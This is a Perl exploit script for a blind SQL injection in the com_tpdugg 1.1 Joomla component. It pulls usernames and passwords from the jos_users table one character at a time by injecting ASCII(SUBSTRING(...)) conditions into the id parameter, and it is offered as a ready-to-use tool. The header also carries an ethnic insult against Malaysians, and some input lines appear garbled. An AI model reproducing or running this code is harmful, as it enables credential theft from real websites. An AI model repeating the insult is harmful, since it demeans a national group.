#!/usr/bin/perl
#//////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\//////////////////////////////////
#
# [o] TPDugg Joomla Component 1.1 Blind SQL Injection Exploit
#
# Software : com_tpdugg version 1.1
# Vendor : http://www.templateplazza.com/
# Author : NoGe
# Contact : noge[dot]code[at]gmail[dot]com
# Blog : http://evilc0de.blogspot.com - http://pacenoge.org
#
# [o] Usage
#
# root@noge:~# perl tpdugg.pl
#
#
# [+] URL Path : www.target.com/[path]
# [+] Valid ID : 1
# [+] Column : username
#
# [!] Exploiting http://www.target.com/[path]/ ...
#
# [+] SELECT username FROM jos_users LIMIT 0,1 ...
# [+] jos_users@username> admin
#
# [!] Exploit completed.
#
# [o] Simple Joomla Password Cracker
#
# http://pacenoge.org/joomla/
#
# [o] Greetz
#
# MainHack BrotherHood [ http://mainhack.net ]
# Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang aJe
# H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
# skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
#
# --=]> COPY MY STYLE BY SAYKOJI <[=--
#
# FUCK MALAYSIA!!!
# DON'T YOU HAVE YOUR OWN CULTURE?
# AHH I FORGOT.. YOU DON'T HAVE ANY CULTURE. HAHAHAHA...
#
#//////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\//////////////////////////////////
use HTTP::Request;
use LWP::UserAgent;
# table : jos_users
# column : username and password
$cmsapp = '[-x-]';
$vuln = 'index.php?option=com_tpdugg&task=tags&id=';
$table = 'jos_users';
$regexp = 'There are no items';
$maxlen = 65;
my $OS = "$^O";
if ($OS eq 'MSWin32') { system("cls"); } else { system("clear"); }
printf "\n
$cmsapp
[x]====================================================[x]
| Joomla Component com_tpdugg BSQL Injection Exploit |
| [F]ound by NoGe [C]oded by Vrs-hCk |
| www[dot]pacenoge[dot]org |
[x]====================================================[x]
\n";
print " [+] URL Path : "; chomp($web=);
print " [+] Valid ID : "; chomp($id=);
print " [+] Column : "; chomp($columns=);
if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; }
print "\n\n [!] Exploiting $target ...\n\n";
&get_data;
print "\n\n [!] Exploit completed.\n\n";
sub get_data() {
@columns = split(/,/, $columns);
foreach $column (@columns) {
print " [+] SELECT $column FROM $table LIMIT 0,1 ...\n";
syswrite(STDOUT, " [+] $table\@$column> ", 255);
for (my $i=1; $i<=$maxlen; $i++) { my $chr = 0; my $found = 0; my $char = 48; while (!$chr && $char<=90) { if(exploit($i,$char) !~ /$regexp/) { $chr = 1; $found = 1; syswrite(STDOUT,chr($char),1); } else { $found = 0; } $char++; } if(!$chr) { $char = 97; while(!$chr && $char<=122) { if(exploit($i,$char) !~ /$regexp/) { $chr = 1; $found = 1; syswrite(STDOUT,chr($char),1); } else { $found = 0; } $char++; } } if (!$found) { print "\n"; last; } } } } sub exploit() { my $limit = $_[0]; my $chars = $_[1]; my $blind = '+AND+ASCII(SUBSTRING((SELECT+'.$column.'+FROM+'.$table.'+LIMIT+0,1),'.$limit.',1))='.$chars; my $inject = $target.$vuln.$id.$blind; my $content = get_content($inject); return $content; } sub get_content() { my $url = $_[0]; my $req = HTTP::Request->new(GET => $url);
my $ua = LWP::UserAgent->new();
$ua->timeout(5);
my $res = $ua->request($req);
if ($res->is_error){
print "\n\n [!] Error, ".$res->status_line.".\n\n";
exit;
}
return $res->content;
}